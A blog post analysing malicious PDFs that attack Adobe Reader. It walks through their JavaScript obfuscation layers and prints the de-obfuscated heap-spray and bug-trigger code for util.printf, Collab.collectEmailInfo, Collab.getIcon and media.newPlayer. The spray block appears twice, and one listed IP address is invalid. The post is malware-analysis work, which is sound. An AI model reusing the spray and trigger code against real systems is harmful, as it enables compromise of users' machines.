Exploring recent PDF exploits: A Time Killer

Over the past few months I've seen numerous articles and CVEs on Adobe Reader and it's vulnerabilities. It seems like everyday I wake up to a new discussion on how to launch some bit of javascript or run application xyz. Well, I've also been seeing many attempts to exploit old vulnerabilities. (Usually by correlating suspicious domains to sets of drive-by-download PDF files thanks to a short script by my friend Dave.) Either way, this last week the number of malicious PDFs increased. So I decided to take some apart and familiarize myself with the different vulnerabilities and how JavaScript played a role. All the information I found had already been documented (and I'll try my best to link to those discoveries). But I want to walk through my investigation and maybe up-turn a few overlooked rocks.

First let me talk a bit about Didier Stevens. I found his blog shortly after I started deciphering the weird syntax that comprises a PDF file. He has a few tools which analyze/generate PDF files, take a look. I used his 'Make PDF' tool to familiarize myself with how PDFs and JavaScript communicate. There's also a short and neat article here which outlines 4 ways to execute JavaScript embedded in a PDF. Didier's page on PDF tools will describe the output of pdfid, but what you want to look for:

  • How Javascript is launched (/Names, /Openction, /AA, /Annots)
  • That the document contains Javascript (/JS, /Javascript)
  • If the document contains obfuscated code, using some type of stream compression/filter

There's also a nice article about writing loaders for IDA which extract shell code from the PDFs. In the next part I'll explain a bit of trivial sneakyness which makes writing a loader a bit more complicated as you'll need to generate a new one for each flavor of 'sneaky'.

Sneakyness

Ok, well the first flavor of documents I analyzed used /Names to run a section of /Javascript (not an exploit yet):

13 0 obj
<</Names [(fea9fc5) 14 0 R ]>>
endobj
14 0 obj
<</S /JavaScript /JS 15 0 R>>
endobj
[...]
17 0 obj
<</Type /Catalog /Pages 1 0 R /PageLayout /OneColumn
/Names <</JavaScript 13 0 R>>
>>
endobj

Not difficult to follow, seems like whatever lies in object 15 will be JavaScript. The next trick: hiding the JavaScript using compression.

15 0 obj
<</Filter [ /FlateDecode ] /Length 2375>>
stream
[...unreadable...]
endstream
endobj

The '/FlateDecode' keyword will decode a string compressed using the flate (or ZIP) compression algorithm. The malware authors are not married to FlateDecode either, take your pick of /ASCIIHexDecode, /ASCII85Decode, /RunLengthDecode, /FlateDecode or any combination/permutation. Any way the author compresses or encodes the JavaScript will be uncompressed with a simple run of pdft. The uncompress command will expose the hidden script. Let's call this layer 1 obfuscation (let's call it the compression layer); it can be algorithmically decoded and shouldn't be enough to fool a PDF analyzer with minor intelligence. (Although having an /OpenAction, /AA or even /JavaScript should be cause enough for investigation.)

The unreadable stream, when uncompressed, is an anonymous JavaScript function called from Object 14. It's slightly unreadable, most likely sent though an obfuscater to prevent scans for words like "eval", "parseInt", "getPage", and etc. After a few minutes of de-obfuscating the code, we get the following (again you can run this though some JavaScript evaluator):

var theMessage = "";
var numWords = this.getPageNumWords(2);
var word;
for (var count = 0; count < numWords; count++) {
  word = this.parseInt(this.getPageNthWord(2, count), 16);
  word = String.fromCharCode(word ^ 28);
  theMessage += word;
}
this.eval(theMessage);

This short bit of JavaScript will decode the second layer of obfuscation, the embedded layer (as it will then reveal a second chunk of JavaScript code embedded as page contents). Walking through this: "getPageNumWords(2)" will get the number of words, separated by whitespace, on the second page of the PDF starting from page 0. Under the catalog object, look for the 'pages' object which will define the order of pages under the /Kids entry. This shows me that object 7 is the 3rd page, and it's contents are stored in object 8 (also a jumbly mess encoded with /FlateDecode). This results in hex, which for each value, the JavaScript algorithm XORs with 28 and concatenates to an evaluated message. More JavaScript. This method is also explained here, there are a few differences, but the general process seems copied.

The exploit

This is where things get interesting, and bear with me as this is my first time reversing malware. I'll start with my favorite part, the portability of the malicious PDF. Up until now I've explained how the exploit (consisting of a bit of JavaScript, bug triggering, and shellcode) is obfuscated. Well this flavor of malicious PDF uses the same bit of obfuscation throughout. And it continues into the exploit code. The first part decrypts a polyalphabetic substitution cipher embedded into the PDF medata, specifically the /Author and /Keywords. The decrypted cipher is a URI, which the exploit (layer 3, the shellcode) uses to phone home the running version of Adobe and to pull down more malware.

Interestingly the code limits the size of the URI to 32 characters, and 24 characters for the version variable. The samples we found included 5 and 6 letter domain names all using the 'com' TLD with 8 or 9 random characters ending with a ".php?&" including subdirectories. The shellcode is stored as unicode characters (which is typical for Adobe exploits utilizing JavaScript) which is concatenated with the 56 byte URI.

After the URI is decrypted, the exploit preforms a series of heap sprays and old bugs in Adobe Reader. Take a look at wishi's article about how to heap spray using JavaScript in Adobe PDFs. It is essentially repeated in the exploit by allocating appropriately 96MB worth of NOPs followed by shellcode before each  bug triggering attempt. The PDF tries running the following bugs: util.printf (CVE-2008-2992), Collab.collectEmailInfo (CVE-2007-5659), Collab.getIcon (CVE-2009-0927), and media.newPlayer (CVE-2009-4324). The best part about this process is a left-over debug feature. Apparently if you change a field in the PDF metadata to "debug" the script will alert before it runs each exploit. (You know, so you can keep track of how you're getting owned.)

How it heap sprays:

var qV = 4194304; /*4megs*/
var ts = unicode.length * 2; /*808*/
var ez = qV - (ts + 56); /*4193440*/
var qL = unescape("% u9090% u9090"); /*nopnopnopnop*/
while (qL.length * 2 /*4*/ < ez /*4193440*/) {
  qL += qL; /*create slide*/
}
qL = qL.substring(0, ez / 2);
var x6 = (qP - 4194304) / qV; /*approx 48*/
for (var jK = 0; jK < x6; jK++) { /*approx 96MB*/
  qN[jK] = qL + unicode; /*allocate memory please*/
}

And the bugs included in the exploit are as follows:

var qV = 4194304; /*4megs*/
var ts = unicode.length * 2; /*808*/
var ez = qV - (ts + 56); /*4193440*/
var qL = unescape("% u9090% u9090"); /*nopnopnopnop*/
while (qL.length * 2 /*4*/ < ez /*4193440*/) {
  qL += qL; /*create slide*/
}
qL = qL.substring(0, ez / 2);
var x6 = (qP - 4194304) / qV; /*approx 48*/
for (var jK = 0; jK < x6; jK++) { /*approx 96MB*/
  qN[jK] = qL + unicode; /*allocate memory please*/
}

And the bugs included in the exploit are as follows:

/*spray heap*/
var aV = "12999999999999999999";
for (dK = 0; dK < 276; dK++) {
  aV += "8";
}
util.printf("%45000f", aV);
/*spray heap*/
var wV = unescape("%u0c0c%u0c0c");
while (wV.length < 44952) {
  wV += wV;
}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: wV});
/*spary heap*/
var jIP = unescape("%09");
while (jIP.length < 16384) {
  jIP += jIP;
}
jIP = "N." + jIP;
app.doc.Collab.getIcon(jIP);
/*spray heap*/
var sf = "1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date);
try {
  media.newPlayer(null);
} catch (e) {}
util.printd(sf, new Date);

Summary

Figure A: Wepawet analysis of feature detection

Over the last few days I've been seeing a few flavors of malicious PDF files. This one contains a similar URI structure, limited to 56 characters by the logic embedded in the exploiting JavaScript code. All of the sampled domain names resolve to 194.8.250.62, 194.8.260.61, or 194.8.250.15, all belonging to a dedicated hosting company in Paraguay. This is most likely a double fast flux which is currently utilizing the servers in Paraguay as proxies.

This is another article explaining a bit about the attack, very few details, and don't be fooled by the URI provided, each sample PDF utilizes a different URI (there is no catch all, just the logic I've noticed and tired to explain above). They do mention something worth noting: the attack begins with a detection of PDF/Java capabilities as shown in the logic from a Wepawet screen capture included as Figure A.

Dave and I are still working on reversing the shellcode (we're not technically savvy enough at this point, but it's a good time to learn!). In this particular flavor of malicious PDF the shellcode is as follows.

Shellcode:

The shellcode extracted from JavaScript in a PDF

It's nothing new, there are a few other sites which list it, including some Wepawet analysis summaries. In the coming weeks I'll expand a bit more on the analysis of a few other flavors, and some threat analysis tricks I've been scheming (related to malicious PDFs).